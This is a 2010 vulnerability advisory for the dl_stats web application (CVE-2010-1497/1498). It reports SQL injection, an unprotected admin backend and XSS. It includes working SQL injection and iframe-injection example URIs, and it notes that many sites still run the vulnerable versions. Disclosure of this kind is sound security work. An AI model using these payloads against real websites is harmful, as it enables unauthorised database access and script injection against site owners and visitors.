Bug: dl_stats 1.2 Multiple Vulnerabilities (WLB-2010040294 Ascii Version)

English Version
WLB2

CVE WLB2

WLB2
Full List
Bugs
Bogus
Tricks
Exploits
CVE MAP
Full List
Vendors
Products
Tools
CWE Dictionary
Google Hacking
Search
General
CVE
CWE
RSS
Full List
Bugs
Exploits
Dorks
Information
Our services
Add note
About
Submit

To add a note,

use this form

or send email to

submit@cxsecurity.com

When contacting via email, we recommend coded messages.

Get our PGP public key

 Topic: dl_stats 1.2 Multiple Vulnerabilities
 Credit: Valentin
 Date: 2010.04.28
 CWE: CWE-79 (Show similar)
CWE-89 (Show similar)
 CVE: CVE-2010-1497 (Show details)
CVE-2010-1498 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

# Exploit Title: dl_stats Multiple Vulnerabilities
# Date: 18.04.2010
# Author: Valentin
# Category: webapps/0day
# Version:
# Tested on:
# CVE :
# Code :


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = dl_stats Multiple Vulnerabilities
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = dl_stats
|:: Vendor = Claus van Beek
|:: Vendor Website = http://clausvb.de/
|:: Affected Version(s) = please view vulnerability details
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: #1 Example URI =
view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())
--
|:: #2 Example URI = download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())--
|::
|:: >> #2 "Vulnerability"
|:: Type = Unprotected Admin Backend
|:: Affected Versions = all
|:: URI = admin/index.htm
|:: This is not a real vulnerability. The admin backend simply isn't protected
|:: by any login, the installation manual recommends to protect it with a
|:: .htaccess file. Many webmasters just forget to do so.
|::
|:: >> #3 Vulnerability
|:: Type = XSS
|:: Affected Versions = < 2.0
|:: Vulnerable File(s) = multiple files
|:: Vulnerable Parameter(s) = multiple parameters
|:: Example URI = download_proc.php?id=<iframe src=http://www.google.de>
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 18.04.2010
|:: The vendor seems to have rewritten the dl_stats software. Since version 2.0
|:: it validates the user input. The vendor only offers the latest version for download.
|:: If you want to test around a little bit you maybe are lucky and find an old
|:: version to download somewhere.
|:: Although version 2.0 was released a long time ago, many websites still use the
|:: old versions for their websites.
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

References:

http://xforce.iss.net/xforce/xfdb/57917
http://www.xenuser.org/documents/security/dl_stats_multiple_vulnerabilities.txt
http://www.xenuser.org/2010/04/18/dl_stats-multiple-vulnerabilities-sqli-xss-unprotected-admin-panel/
http://www.vupen.com/english/advisories/2010/0939
http://www.securityfocus.com/bid/39592
http://www.osvdb.org/63908
http://www.osvdb.org/63907
http://www.exploit-db.com/exploits/12280
http://secunia.com/advisories/39496
http://packetstormsecurity.org/1004-exploits/dlstats-sqlxssadmin.txt

[ ASCII VERSION ]
Copyright 2012, cxsecurity.com